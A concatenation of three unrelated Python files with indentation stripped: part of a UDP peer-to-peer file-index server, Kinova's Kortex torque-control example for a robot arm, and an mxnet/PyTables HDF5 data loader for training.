recv_msg = json.loads(data.decode('utf-8')) # Convert the JSON payload into a dict
# Create a thread for each client request
thread = threading.Thread(target=self._handle_request, args=(recv_msg,peer_udp))
thread.start() # Start the thread
thread.join() # Wait for the thread to finish
except Exception as e:
print(e)
self.UDPServerSocket.close()
break
def _handle_request(self, recv_msg, peer_udp):
"""
Dispatches the request to the appropriate method with the required information.
"""
address, ports = recv_msg["sender"] # Peer that issued the request
peer_tcp = (address, ports[0])
peer_udp = (address, ports[1])
peer_udp_alive = (address, ports[2])
msg_type = recv_msg["msg_type"] # Request type
content = recv_msg["content"] # Request payload
if msg_type == "JOIN":
return self._handle_join(peer_tcp, peer_udp, peer_udp_alive, content)
elif msg_type == "UPDATE":
return self._handle_update(peer_tcp, peer_udp, peer_udp_alive, content)
elif msg_type == "SEARCH":
return self._handle_search(peer_tcp, peer_udp, content)
elif msg_type == "LEAVE":
return self._handle_leave(peer_tcp, peer_udp, peer_udp_alive)
else:
msg = Message(content="Invalid command - unknown to the server.", msg_type="UNKNOWN", sender=self.SERVER)
self.UDPServerSocket.sendto(msg.to_json("utf-8"), peer_udp)
def _handle_join(self, peer_tcp, peer_udp, peer_udp_alive, content):
"""
Records the peer in the server's data structure only if it is not already connected.
"""
file_lst = content.strip() # Strip any leading/trailing whitespace from the string
peer = (peer_tcp[0], (peer_tcp[1], peer_udp[1], peer_udp_alive[1]))
if peer not in self.peers:
self.peers[peer] = file_lst.split() # Register the peer on the server
print(f"Peer [{peer_tcp[0]}]:[{peer_tcp[1]}] added with files {file_lst}")
msg = Message(content=None, msg_type="JOIN_OK", sender=self.SERVER)
self.UDPServerSocket.sendto(msg.to_json("utf-8"), peer_udp)
else:
msg = Message(content="You are already connected\n", msg_type="JOIN_OK", sender=self.SERVER)
self.UDPServerSocket.sendto(msg.to_json("utf-8"), peer_udp)
# print(f"Peer [{peer_tcp[0]}]:{peer_tcp[1]} is already connected.")
def _handle_update(self, peer_tcp, peer_udp, peer_udp_alive, new_file):
"""
Adds a file to the file list of a peer that is already on the network.
"""
peer = (peer_tcp[0], (peer_tcp[1], peer_udp[1], peer_udp_alive[1]))
update_file = new_file.strip()
if peer in self.peers:
if update_file not in self.peers[peer]: # Only update when the file is new
self.peers[peer].append(update_file) # Append the already-stripped filename to the peer's file list
msg = Message(content=None, msg_type="UPDATE_OK", sender=self.SERVER)
self.UDPServerSocket.sendto(msg.to_json("utf-8"), peer_udp)
def _handle_search(self, peer_tcp, peer_udp, content):
"""
Finds which peers have the requested file.
"""
filename = content.strip() # Strip leading/trailing whitespace from the string
print(f"Peer [{peer_tcp[0]}]:[{peer_tcp[1]}] requested file {filename}")
has_peers = [f"{peer[0]}:{peer[1][0]}" for peer in self.peers if (filename in self.peers[peer]) and (peer_tcp != (peer[0],peer[1][0]))]
msg = Message(content="[" + " ".join(has_peers) + "]",
msg_type="SEARCH",
sender=self.SERVER,
extra_info=filename)
self.UDPServerSocket.sendto(msg.to_json("utf-8"), peer_udp)
def _handle_leave(self, peer_tcp, peer_udp, peer_udp_alive):
"""
Removes the peer's information from the network.
"""
peer = (peer_tcp[0], (peer_tcp[1], peer_udp[1], peer_udp_alive[1]))
if peer in self.peers:
self.peers.pop(peer) # Remove the peer from the server
msg = Message(content=None, msg_type="LEAVE_OK", sender=self.SERVER)
self.UDPServerSocket.sendto(msg.to_json("utf-8"), peer_udp)
def broadcast(self):
"""
Sends an ALIVE request to every peer every 'BROAD_CAST_TIME_INTERVAL' seconds.
"""
msg = Message(content=None, msg_type="ALIVE", sender=self.SERVER, extra_info=(self.ALIVE_PORT))
thread_alive = threading.Timer(self.BROAD_CAST_TIME_INTERVAL, self._broadcast_alive, args=[msg,]) # Schedule a thread every 'BROAD_CAST_TIME_INTERVAL' seconds
start_time = time.time()
thread_alive.start() # Start the thread
thread_alive.join() # Wait for thread_alive to finish
# print("--- %s seconds ---" % (time.time() - start_time))
self.broadcast()
def _broadcast_alive(self,msg):
"""
Creates a thread for each peer on the network.
"""
tmp_copy = copy.deepcopy(self.peers) # Use a copy so a peer is not removed from the network while it is being iterated over.
for peer in tmp_copy:
thread = threading.Thread(target=self._handle_alive, args=[msg, peer])
thread.start()
thread.join()
def _handle_alive(self, msg, peer):
"""
Asks whether the peer is alive via the udp_alive port.
"""
try:
address, ports = peer
self.UDPAliveSocket.sendto(msg.to_json("utf-8"), (address, ports[2]))
self.UDPAliveSocket.settimeout(self.ALIVE_TIMEOUT)
_ = self.UDPAliveSocket.recvfrom(self.BUFFERSIZE)
self.UDPAliveSocket.settimeout(None)
except socket.timeout:
print(f"Peer [{peer[0]}]:[{peer[1][0]}] is dead. Removing its files [{' '.join(self.peers[peer])}]")
self.peers.pop(peer)
if __name__ == "__main__":
server = Servidor()
# Responsible for answering all UDP requests from the peers
listening_thread = threading.Thread(target=server._receive)
# Responsible for asking the peers whether they are alive
alive_thread = threading.Thread(target=server.broadcast)
listening_thread.start()
alive_thread.start()
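# A hedged sketch (not part of the original assignment code) of how a peer could issue
# a single JOIN request against this server. It is never called here; the Message
# constructor arguments are assumed from the usages above (content, msg_type, sender
# keywords and the to_json() method).
def example_join_request(tcp_port=20000, udp_port=20001, alive_port=20002):
    """Send one JOIN request with a space-separated file list and print the reply (sketch only)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((Servidor.HOST, udp_port))
    # "sender" mirrors what _handle_request() unpacks: (address, (tcp, udp, udp_alive))
    sender = (Servidor.HOST, (tcp_port, udp_port, alive_port))
    msg = Message(content="file1.txt file2.txt", msg_type="JOIN", sender=sender)
    sock.sendto(msg.to_json("utf-8"), Servidor.SERVER)
    data, _ = sock.recvfrom(Servidor.BUFFERSIZE)
    print(json.loads(data.decode('utf-8')))
    sock.close()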
|
01-torque_control_cyclic.py
|
#! /usr/bin/env python3
###
# KINOVA (R) KORTEX (TM)
#
# Copyright (c) 2019 Kinova inc. All rights reserved.
#
# This software may be modified and distributed
# under the terms of the BSD 3-Clause license.
#
# Refer to the LICENSE file for details.
#
###
###
# * DESCRIPTION OF CURRENT EXAMPLE:
# ===============================
# This example works as a simple haptic-like demo.
#
# The last actuator, the small one holding the interconnect, acts as a torque sensing device commanding the first actuator.
# The first actuator, the big one on the base, is controlled in torque and its position is sent as a command to the last one.
#
# The script can be launched through command line with python3: python torqueControl_example.py
# The PC should be connected through ethernet with the arm. Default IP address 192.168.1.10 is used as arm address.
#
# 1- Connection with the base:
# 1- A TCP session is started on port 10000 for most API calls. Refresh is at 25ms on this port.
# 2- A UDP session is started on port 10001 for BaseCyclic calls. Refresh is at 1ms on this port only.
# 2- Initialization
# 1- First frame is built based on arm feedback to ensure continuity
# 2- First actuator torque command is set as well
# 3- Base is set in low-level servoing
# 4- First frame is sent
# 5- First actuator is switched to torque mode
# 3- Cyclic thread is running at 1ms
# 1- Torque command to first actuator is set to a multiple of last actuator torque measure minus its initial value to
# avoid an initial offset error
# 2- Position command to last actuator equals first actuator position minus initial delta
#
# 4- On keyboard interrupt, example stops
# 1- Cyclic thread is stopped
# 2- First actuator is set back to position control
# 3- Base is set in single level servoing (default)
###
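# Example invocations (a sketch only: --cyclic_time, --duration and --print_stats are
# defined in main() below, while connection flags such as --ip come from the shared
# "utilities" helper and are assumed here):
#   python3 01-torque_control_cyclic.py --duration 30 --cyclic_time 0.001
#   python3 01-torque_control_cyclic.py --ip 192.168.1.10 --duration 0 --print_stats 0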
import sys
import os
from kortex_api.autogen.client_stubs.ActuatorConfigClientRpc import ActuatorConfigClient
from kortex_api.autogen.client_stubs.ActuatorCyclicClientRpc import ActuatorCyclicClient
from kortex_api.autogen.client_stubs.BaseClientRpc import BaseClient
from kortex_api.autogen.client_stubs.BaseCyclicClientRpc import BaseCyclicClient
from kortex_api.autogen.client_stubs.DeviceConfigClientRpc import DeviceConfigClient
from kortex_api.autogen.client_stubs.DeviceManagerClientRpc import DeviceManagerClient
from kortex_api.autogen.messages import Session_pb2, ActuatorConfig_pb2, Base_pb2, BaseCyclic_pb2, Common_pb2
from kortex_api.RouterClient import RouterClientSendOptions
import time
import sys
import threading
class TorqueExample:
def __init__(self, router, router_real_time):
# Maximum allowed waiting time during actions (in seconds)
self.ACTION_TIMEOUT_DURATION = 20
self.torque_amplification = 2.0 # Torque measure on last actuator is sent as a command to first actuator
# Create required services
device_manager = DeviceManagerClient(router)
self.actuator_config = ActuatorConfigClient(router)
self.base = BaseClient(router)
self.base_cyclic = BaseCyclicClient(router_real_time)
self.base_command = BaseCyclic_pb2.Command()
self.base_feedback = BaseCyclic_pb2.Feedback()
self.base_custom_data = BaseCyclic_pb2.CustomData()
# Detect all devices
device_handles = device_manager.ReadAllDevices()
self.actuator_count = self.base.GetActuatorCount().count
# Only actuators are relevant for this example
for handle in device_handles.device_handle:
if handle.device_type == Common_pb2.BIG_ACTUATOR or handle.device_type == Common_pb2.SMALL_ACTUATOR:
self.base_command.actuators.add()
self.base_feedback.actuators.add()
# Change send option to reduce max timeout at 3ms
self.sendOption = RouterClientSendOptions()
self.sendOption.andForget = False
self.sendOption.delay_ms = 0
self.sendOption.timeout_ms = 3
self.cyclic_t_end = 30 #Total duration of the thread in seconds. 0 means infinite.
self.cyclic_thread = {}
self.kill_the_thread = False
self.already_stopped = False
self.cyclic_running = False
# Create closure to set an event after an END or an ABORT
def check_for_end_or_abort(self, e):
"""Return a closure checking for END or ABORT notifications
Arguments:
e -- event to signal when the action is completed
(will be set when an END or ABORT occurs)
"""
def check(notification, e = e):
print("EVENT : " + \
Base_pb2.ActionEvent.Name(notification.action_event))
if notification.action_event == Base_pb2.ACTION_END \
or notification.action_event == Base_pb2.ACTION_ABORT:
e.set()
return check
def MoveToHomePosition(self):
# Make sure the arm is in Single Level Servoing mode
base_servo_mode = Base_pb2.ServoingModeInformation()
base_servo_mode.servoing_mode = Base_pb2.SINGLE_LEVEL_SERVOING
self.base.SetServoingMode(base_servo_mode)
# Move arm to ready position
print("Moving the arm to a safe position")
action_type = Base_pb2.RequestedActionType()
action_type.action_type = Base_pb2.REACH_JOINT_ANGLES
action_list = self.base.ReadAllActions(action_type)
action_handle = None
for action in action_list.action_list:
if action.name == "Home":
action_handle = action.handle
if action_handle == None:
print("Can't reach safe position. Exiting")
return False
e = threading.Event()
notification_handle = self.base.OnNotificationActionTopic(
self.check_for_end_or_abort(e),
Base_pb2.NotificationOptions()
)
self.base.ExecuteActionFromReference(action_handle)
print("Waiting for movement to finish ...")
finished = e.wait(self.ACTION_TIMEOUT_DURATION)
self.base.Unsubscribe(notification_handle)
if finished:
print("Movement completed")
else:
print("Timeout on action notification wait")
return finished
return True
def InitCyclic(self, sampling_time_cyclic, t_end, print_stats):
if self.cyclic_running:
return True
# Move to Home position first
if not self.MoveToHomePosition():
return False
print("Init Cyclic")
sys.stdout.flush()
base_feedback = self.SendCallWithRetry(self.base_cyclic.RefreshFeedback, 3)
if base_feedback:
self.base_feedback = base_feedback
# Init command frame
for x in range(self.actuator_count):
self.base_command.actuators[x].flags = 1 # servoing
self.base_command.actuators[x].position = self.base_feedback.actuators[x].position
# First actuator is going to be controlled in torque
# To ensure continuity, torque command is set to measure
self.base_command.actuators[0].torque_joint = self.base_feedback.actuators[0].torque
# Set arm in LOW_LEVEL_SERVOING
base_servo_mode = Base_pb2.ServoingModeInformation()
base_servo_mode.servoing_mode = Base_pb2.LOW_LEVEL_SERVOING
self.base.SetServoingMode(base_servo_mode)
# Send first frame
self.base_feedback = self.base_cyclic.Refresh(self.base_command, 0, self.sendOption)
# Set first actuator in torque mode now that the command is equal to measure
control_mode_message = ActuatorConfig_pb2.ControlModeInformation()
control_mode_message.control_mode = ActuatorConfig_pb2.ControlMode.Value('TORQUE')
device_id = 1 # first actuator has id = 1
self.SendCallWithRetry(self.actuator_config.SetControlMode, 3, control_mode_message, device_id)
# Init cyclic thread
self.cyclic_t_end = t_end
self.cyclic_thread = threading.Thread(target=self.RunCyclic, args=(sampling_time_cyclic, print_stats))
self.cyclic_thread.daemon = True
self.cyclic_thread.start()
return True
else:
print("InitCyclic: failed to communicate")
return False
def RunCyclic(self, t_sample, print_stats):
self.cyclic_running = True
print("Run Cyclic")
sys.stdout.flush()
cyclic_count = 0 # Counts refresh
stats_count = 0 # Counts stats prints
failed_cyclic_count = 0 # Count communication timeouts
# Initial delta between first and last actuator
init_delta_position = self.base_feedback.actuators[0].position - self.base_feedback.actuators[self.actuator_count - 1].position
# Initial first and last actuator torques; avoids unexpected movement due to torque offsets
init_last_torque = self.base_feedback.actuators[self.actuator_count - 1].torque
init_first_torque = -self.base_feedback.actuators[0].torque # Torque measure is reversed compared to actuator direction
t_now = time.time()
t_cyclic = t_now # cyclic time
t_stats = t_now # print time
t_init = t_now # init time
print("Running torque control example for {} seconds".format(self.cyclic_t_end))
while not self.kill_the_thread:
t_now = time.time()
# Cyclic Refresh
if (t_now - t_cyclic) >= t_sample:
t_cyclic = t_now
# Position command to the first actuator is set to the measured position so that no following error is triggered
# Bonus: by doing this instead of disabling the following error, if communication is lost while the first
# actuator keeps moving under torque command, the resulting position error will trigger a following
# error and switch the actuator back to position control so that it holds its position
self.base_command.actuators[0].position = self.base_feedback.actuators[0].position
# First actuator torque command is set to last actuator torque measure times an amplification
self.base_command.actuators[0].torque_joint = init_first_torque + \
self.torque_amplification * (self.base_feedback.actuators[self.actuator_count - 1].torque - init_last_torque)
# First actuator position is sent as a command to last actuator
self.base_command.actuators[self.actuator_count - 1].position = self.base_feedback.actuators[0].position - init_delta_position
# Incrementing the frame identifier ensures actuators can reject out-of-date frames
self.base_command.frame_id += 1
if self.base_command.frame_id > 65535:
self.base_command.frame_id = 0
for i in range(self.actuator_count):
self.base_command.actuators[i].command_id = self.base_command.frame_id
# Frame is sent
try:
self.base_feedback = self.base_cyclic.Refresh(self.base_command, 0, self.sendOption)
except:
failed_cyclic_count = failed_cyclic_count + 1
cyclic_count = cyclic_count + 1
# Stats Print
if print_stats and ((t_now - t_stats) > 1):
t_stats = t_now
stats_count = stats_count + 1
cyclic_count = 0
failed_cyclic_count = 0
sys.stdout.flush()
if self.cyclic_t_end != 0 and (t_now - t_init > self.cyclic_t_end):
print("Cyclic Finished")
sys.stdout.flush()
break
self.cyclic_running = False
return True
def StopCyclic(self):
print ("Stopping the cyclic and putting the arm back in position mode...")
if self.already_stopped:
return
# Kill the thread first
if self.cyclic_running:
self.kill_the_thread = True
self.cyclic_thread.join()
# Set first actuator back in position mode
control_mode_message = ActuatorConfig_pb2.ControlModeInformation()
control_mode_message.control_mode = ActuatorConfig_pb2.ControlMode.Value('POSITION')
device_id = 1 # first actuator has id = 1
self.SendCallWithRetry(self.actuator_config.SetControlMode, 3, control_mode_message, device_id)
base_servo_mode = Base_pb2.ServoingModeInformation()
base_servo_mode.servoing_mode = Base_pb2.SINGLE_LEVEL_SERVOING
self.base.SetServoingMode(base_servo_mode)
self.cyclic_t_end = 0.1
self.already_stopped = True
print('Clean Exit')
@staticmethod
def SendCallWithRetry(call, retry, *args):
i = 0
arg_out = []
while i < retry:
try:
arg_out = call(*args)
break
except:
i = i + 1
continue
if i == retry:
print("Failed to communicate")
return arg_out
def main():
# Import the utilities helper module
import argparse
sys.path.insert(0, os.path.join(os.path.dirname(__file__), ".."))
import utilities
# Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("--cyclic_time", type=float, help="delay, in seconds, between cyclic control calls", default=0.001)
parser.add_argument("--duration", type=int, help="example duration, in seconds (0 means infinite)", default=30)
parser.add_argument("--print_stats", default=True, help="print stats in command line or not (0 to disable)", type=lambda x: (str(x).lower() not in ['false', '0', 'no']))
args = utilities.parseConnectionArguments(parser)
# Create connection to the device and get the router
with utilities.DeviceConnection.createTcpConnection(args) as router:
with utilities.DeviceConnection.createUdpConnection(args) as router_real_time:
example = TorqueExample(router, router_real_time)
success = example.InitCyclic(args.cyclic_time, args.duration, args.print_stats)
if success:
while example.cyclic_running:
try:
time.sleep(0.5)
except KeyboardInterrupt:
break
example.StopCyclic()
return 0 if success else 1
if __name__ == "__main__":
exit(main())
|
data.py
|
from __future__ import print_function
import numpy as np
import mxnet as mx
import multiprocessing
import time
import logging
import tables
tables.set_blosc_max_threads(4)
def add_data_args(parser):
data = parser.add_argument_group('Data', 'the input data')
data.add_argument('--data-config', type=str, help='the python file for data format')
data.add_argument('--data-train', type=str, help='the training data')
# data.add_argument('--data-val', type=str, help='the validation data')
data.add_argument('--train-val-split', type=float, help='fraction of files used for training')
data.add_argument('--data-test', type=str, help='the test data')
data.add_argument('--data-example', type=str, help='the example data')
data.add_argument('--dryrun', action="store_true", default=False, help='Run over a small example file.')
data.add_argument('--data-names', type=str, help='the data names')
data.add_argument('--label-names', type=str, help='the label names')
data.add_argument('--weight-names', type=str, help='the training data')
# data.add_argument('--num-classes', type=int, help='the number of classes')
data.add_argument('--num-examples', type=int, help='the number of training examples')
data.add_argument('--syn-data', action="store_true", default=False, help='Generate dummy data on the fly.')
data.add_argument('--dataloader-nworkers', type=int, default=2, help='the number of threads used for data loader.')
data.add_argument('--dataloader-qsize', type=int, default=256, help='the queue size for data loader.')
data.add_argument('--dataloader-weight-scale', type=float, default=1, help='the weight scale for data loader.')
data.add_argument('--dataloader-max-resample', type=int, default=10, help='max times to repeat the sampling.')
return data
class DataFormat(object):
def __init__(self, train_groups, train_vars, label_var, wgtvar, obs_vars=[], extra_label_vars=[], pad_params=None, pad_dest_vars=[], pad_src_var=None, pad_constant=None, pad_random_range=None, random_augment_vars=None, random_augment_scale=None, sort_by=None, point_mode=None, filename=None, plotting_mode=False, train_var_range=None):
self.train_groups = train_groups # list
self.train_vars = train_vars # dict
self.sort_by = sort_by # dict {v_group:{'var':x, 'descend':False}}
self.label_var = label_var
self.wgtvar = wgtvar # set to None if not using weights
self.obs_vars = obs_vars # list
self.extra_label_vars = extra_label_vars # list
self.point_mode = point_mode
self.pad_params = pad_params
if pad_params is None:
self.pad_params = {v_group:{
'vars':pad_dest_vars, # list
'src':pad_src_var, # str
'constant':pad_constant, # float
'random':pad_random_range, # list or tuple of 2 floats
} for v_group in train_groups}
else:
for v_group in train_groups:
if v_group not in self.pad_params:
self.pad_params[v_group] = {'src':None, 'vars':[]}
if pad_params is not None and pad_src_var is not None:
logging.debug('Padding info:\n ' + str(self.pad_params))
self.random_augment_vars = random_augment_vars # list
self.random_augment_scale = random_augment_scale # float
self._set_range(plotting_mode, train_var_range)
self._parse_file(filename)
def _set_range(self, plotting_mode, train_var_range):
# weight/var range
self.WEIGHT_MIN = 0.
self.WEIGHT_MAX = 1.
if not plotting_mode:
if train_var_range is None:
self.VAR_MIN = -5.
self.VAR_MAX = 5.
else:
self.VAR_MIN, self.VAR_MAX = train_var_range
else:
self.VAR_MIN = -1e99
self.VAR_MAX = 1e99
@staticmethod
def nevts(filename, label_var='label'):
with tables.open_file(filename) as f:
# return getattr(f.root, f.root.__members__[0]).shape[0]
return getattr(f.root, label_var).shape[0]
@staticmethod
def nwgtsum(filename, weight_vars='weight,class_weight'):
wgt_vars = weight_vars.replace(' ', '').split(',')
assert len(wgt_vars) > 0
with tables.open_file(filename) as f:
return np.sum(np.prod([getattr(f.root, w) for w in wgt_vars], axis=0))
@staticmethod
def num_classes(filename, label_var='label'):
with tables.open_file(filename) as f:
try:
return getattr(f.root, label_var).shape[1]
except IndexError:
return getattr(f.root, label_var)[:].max()
def _parse_file(self, filename):
self.train_groups_shapes = {}
with tables.open_file(filename) as f:
self.num_classes = self.num_classes(filename, self.label_var)
if getattr(f.root, self.label_var).title:
self.class_labels = getattr(f.root, self.label_var).title.split(',')
else:
self.class_labels = [self.label_var]
for v_group in self.train_groups:
n_channels = len(self.train_vars[v_group])
a = getattr(f.root, self.train_vars[v_group][0])
if a.ndim == 3:
# (n, W, H)
width, height = int(a.shape[1]), int(a.shape[2])
elif a.ndim == 2:
# (n, W)
width, height = int(a.shape[1]), 1
elif a.ndim == 1:
# (n,)
width, height = 1, 1
else:
raise RuntimeError
self.train_groups_shapes[v_group] = (n_channels, width, height)
if self.point_mode == 'NPC':
self.train_groups_shapes[v_group] = (width, n_channels)
elif self.point_mode == 'NCP':
self.train_groups_shapes[v_group] = (n_channels, width)
class PyTableEnqueuer(object):
"""Builds a queue out of a data generator.
see, e.g., https://github.com/fchollet/keras/blob/master/keras/engine/training.py
# Arguments
filelist: list of input PyTables (HDF5) files
data_format: DataFormat object describing the inputs, labels and weights
"""
def __init__(self, filelist, data_format, batch_size, workers=4, q_size=20, shuffle=True, predict_mode=False, fetch_size=100000, up_sample=False, weight_scale=1, max_resample=20):
self._filelist = filelist
self._data_format = data_format
self._batch_size = batch_size
self._shuffle = shuffle
self._predict_mode = predict_mode
self._fetch_size = (fetch_size // batch_size + 1) * batch_size
self._up_sample = up_sample
self._weight_scale = weight_scale
self._max_resample = max_resample
self._workers = workers
self._q_size = q_size
self._lock = multiprocessing.Lock()
self._counter = None # how many processes are running
self._threads = []
self._stop_event = None
self.queue = None
self._file_indices = None
self._idx = None # position of the index for next file
def data_generator_task(self, ifile):
if self._stop_event.is_set():
# do nothing if the queue has been stopped (e.g., due to exceptions)
return
with self._lock:
# increase counter by 1
self._counter.value += 1
try:
fbegin = 0
with tables.open_file(self._filelist[ifile]) as f:
nevts = getattr(f.root, f.root.__members__[0]).shape[0]
while fbegin < nevts:
fend = fbegin + self._fetch_size
# --------- Read from files ----------
# features
X_fetch = {}
for v_group in self._data_format.train_groups:
pad_param = self._data_format.pad_params[v_group]
# update variable ordering if needed
if self._data_format.sort_by and self._data_format.sort_by[v_group]:
if pad_param['src'] is not None:
raise NotImplementedError('Cannot do random pad and sorting at the same time now -- to be implemented')
ref_a = getattr(f.root, self._data_format.sort_by[v_group]['var'])[fbegin:fend]
len_a = getattr(f.root, self._data_format.sort_by[v_group]['length_var'])[fbegin:fend]
for i in range(len_a.shape[0]):
ref_a[i, int(len_a[i]):] = -np.inf if self._data_format.sort_by[v_group]['descend'] else np.inf
if ref_a.ndim != 2:
# shape should be (num_samples, num_particles)
raise NotImplementedError('Cannot sort variable group %s' % v_group)
# https://stackoverflow.com/questions/10921893/numpy-sorting-a-multidimensional-array-by-a-multidimensional-array
if self._data_format.sort_by[v_group]['descend']:
sorting_indices = np.argsort(-ref_a, axis=1)
else:
sorting_indices = np.argsort(ref_a, axis=1)
X_group = [getattr(f.root, v_name)[fbegin:fend][np.arange(ref_a.shape[0])[:, np.newaxis], sorting_indices]
for v_name in self._data_format.train_vars[v_group]]
else:
X_group = []
pad_mask_a = None if pad_param['src'] is None else getattr(f.root, pad_param['src'])[fbegin:fend] == 0
for v_name in self._data_format.train_vars[v_group]:
a = getattr(f.root, v_name)[fbegin:fend]
if v_name in pad_param['vars']:
if pad_mask_a is None:
raise RuntimeError('Padding `src` is not set for group %s!' % v_group)
if pad_param.get('constant', None) is not None:
a[pad_mask_a] = pad_param['constant']
elif pad_param.get('random', None) is not None:
a_rand = np.random.uniform(low=pad_param['random'][0], high=pad_param['random'][1], size=a.shape)
a[pad_mask_a] = a_rand[pad_mask_a]
else:
raise RuntimeError('Neither `constant` nor `random` is set for padding!')
if not self._predict_mode and self._data_format.random_augment_vars is not None and v_name in self._data_format.random_augment_vars:
a *= np.random.normal(loc=1, scale=self._data_format.random_augment_scale, size=a.shape)
X_group.append(a)
shape = (-1,) + self._data_format.train_groups_shapes[v_group] # (n, C, W, H), use -1 because end can go out of range
if X_group[0].ndim == 3:
# shape=(n, W, H): e.g., 2D image
assert len(X_group) == 1
x_arr = X_group[0]
elif X_group[0].ndim < 3:
# shape=(n, W) if ndim=2: (e.g., track list)
# shape=(n,) if ndim=1: (global var)
if self._data_format.point_mode == 'NPC':
x_arr = np.stack(X_group, axis=-1)
else:
x_arr = np.stack(X_group, axis=1)
else:
raise NotImplementedError
# if seq_order == 'channels_last':
# x_arr = x_arr.transpose((0, 2, 1))
X_fetch[v_group] = np.clip(x_arr, self._data_format.VAR_MIN, self._data_format.VAR_MAX).reshape(shape)
# logging.debug(' -- v_group=%s, fetch_array.shape=%s, reshape=%s' % (v_group, str(X_group[0].shape), str(shape)))
# labels
y_fetch = getattr(f.root, self._data_format.label_var)[fbegin:fend]
# observers
Z_fetch = None
if self._predict_mode:
Z_fetch = np.stack([getattr(f.root, v_name)[fbegin:fend] for v_name in self._data_format.obs_vars], axis=1)
# extra labels
ext_fetch = None
if self._data_format.extra_label_vars:
ext_fetch = np.stack([getattr(f.root, v_name)[fbegin:fend] for v_name in self._data_format.extra_label_vars], axis=1)
# weights
W_fetch = None
if not self._predict_mode and self._data_format.wgtvar:
w_vars = self._data_format.wgtvar.replace(' ', '').split(',')
wgt = getattr(f.root, w_vars[0])[fbegin:fend]
for idx in range(1, len(w_vars)):
wgt *= getattr(f.root, w_vars[idx])[fbegin:fend]
W_fetch = wgt
fbegin += self._fetch_size
# --------- process weight, shuffle ----------
n_fetched = len(y_fetch)
# sampling the array according to the weights (require weight<1)
all_indices = np.arange(n_fetched)
keep_indices = None
if W_fetch is not None:
randwgt = np.random.uniform(low=0, high=self._weight_scale, size=n_fetched)
keep_flags = randwgt < W_fetch
if not self._up_sample:
keep_indices = all_indices[keep_flags]
else:
keep_indices = [all_indices[keep_flags]]
n_scale = n_fetched // max(1, len(keep_indices[0]))
if n_scale > self._max_resample:
if ifile == 0 and fbegin == self._fetch_size:
logging.debug('n_scale=%d is larger than the max value (%d). Setting to %d' % (n_scale, self._max_resample, self._max_resample))
n_scale = self._max_resample
# print(n_scale)
for _ in range(n_scale - 1):
randwgt = np.random.uniform(size=n_fetched)
keep_indices.append(all_indices[randwgt < W_fetch])
keep_indices = np.concatenate(keep_indices)
# shuffle if do training
shuffle_indices = None
if self._shuffle:
shuffle_indices = keep_indices if keep_indices is not None else all_indices
np.random.shuffle(shuffle_indices)
if shuffle_indices is not None or keep_indices is not None:
indices = shuffle_indices if shuffle_indices is not None else keep_indices
for v_group in X_fetch:
X_fetch[v_group] = X_fetch[v_group][indices]
y_fetch = y_fetch[indices]
if Z_fetch is not None:
Z_fetch = Z_fetch[indices]
if ext_fetch is not None:
ext_fetch = ext_fetch[indices]
# --------- put batches into the queue ----------
for b in range(0, len(y_fetch), self._batch_size):
# delay = np.random.uniform() / 100
# time.sleep(delay)
e = b + self._batch_size
X_batch = {v_group:X_fetch[v_group][b:e] for v_group in X_fetch}
y_batch = y_fetch[b:e]
Z_batch = None if Z_fetch is None else Z_fetch[b:e]
ext_batch = None if ext_fetch is None else ext_fetch[b:e]
if len(y_batch) == self._batch_size:
self.queue.put((X_batch, y_batch, ext_batch, Z_batch))
except Exception:
# set stop flag if any exception occurs
self._stop_event.set()
raise
with self._lock:
# decrease counter value by 1
self._counter.value -= 1
def start(self):
"""Kicks off threads which add data from the generator into the queue.
The number of workers (self._workers) and the queue size (self._q_size) are
taken from the constructor; worker processes are added lazily via add().
"""
logging.debug('Starting queue, file[0]=' + self._filelist[0])
try:
self._counter = multiprocessing.Value('i', 0)
self._threads = []
self._stop_event = multiprocessing.Event()
self.queue = multiprocessing.Queue(maxsize=self._q_size)
self._idx = 0
self._file_indices = np.arange(len(self._filelist))
np.random.shuffle(self._file_indices)
self.add()
except:
self.stop()
raise
def add(self):
'''Try adding a process if the pool is not full.'''
def run(ifile):
self.data_generator_task(ifile)
if len(self._threads) >= len(self._filelist):
# all files are processed
return
try:
if self._counter.value < self._workers:
# Reset random seed else all children processes
# share the same seed
np.random.seed()
thread = multiprocessing.Process(target=run, args=(self._file_indices[self._idx],))
thread.daemon = True
self._threads.append(thread)
thread.start()
self._idx += 1
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set() and sum([t.is_alive() for t in self._threads])
def stop(self):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
Worker processes are terminated and the shared queue is closed.
"""
logging.debug('Stopping queue, file[0]=' + self._filelist[0])
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
thread.terminate()
if self.queue is not None:
self.queue.close()
self._counter = None
self._threads = []
self._stop_event = None
self.queue = None
self._file_indices = None
self._idx = None
class DataLoader(mx.io.DataIter):
def __init__(self, filelist, data_format, batch_size, shuffle=True, predict_mode=False, fetch_size=600000, up_sample=True, one_hot_label=False, args=None):
self._data_format = data_format
self._batch_size = batch_size
self._workers = args.dataloader_nworkers
self._q_size = args.dataloader_qsize
self._weight_scale = args.dataloader_weight_scale
self._max_resample = args.dataloader_max_resample
self._predict_mode = predict_mode
self._one_hot_label = one_hot_label
self.args = args
self._provide_data = []
for v_group in self._data_format.train_groups:
shape = (batch_size,) + self._data_format.train_groups_shapes[v_group]
self._provide_data.append((v_group, shape))
self._provide_label = [('softmax_label', (batch_size,))]
for v in self._data_format.extra_label_vars:
self._provide_label.append(('label_' + v, (batch_size,)))
h5_samples = sum([DataFormat.nevts(filename, self._data_format.label_var) for filename in filelist])
self.steps_per_epoch = h5_samples // batch_size
if not self.args.syn_data:
self.enqueuer = PyTableEnqueuer(filelist, data_format, batch_size, self._workers, self._q_size, shuffle, predict_mode, fetch_size, up_sample, weight_scale=self._weight_scale, max_resample=self._max_resample)
self._wait_time = 0.01 # in seconds
self.reset()
@property
def provide_data(self):
return self._provide_data
@property
def provide_label(self):
return self._provide_label
def get_truths(self):
return np.concatenate(self._truths)
def get_observers(self):
return np.concatenate(self._observers)
def __iter__(self):
return self
def reset(self):
self._ibatch = 0
self._data = None
self._label = None
# stores truths and observers
if self._predict_mode:
self._truths = []
self._observers = []
if not self.args.syn_data:
self.enqueuer.stop()
self.enqueuer.start()
def __next__(self):
return self.next()
def next(self):
self._ibatch += 1
if self.args.syn_data:
if self._ibatch > self.steps_per_epoch:
raise StopIteration
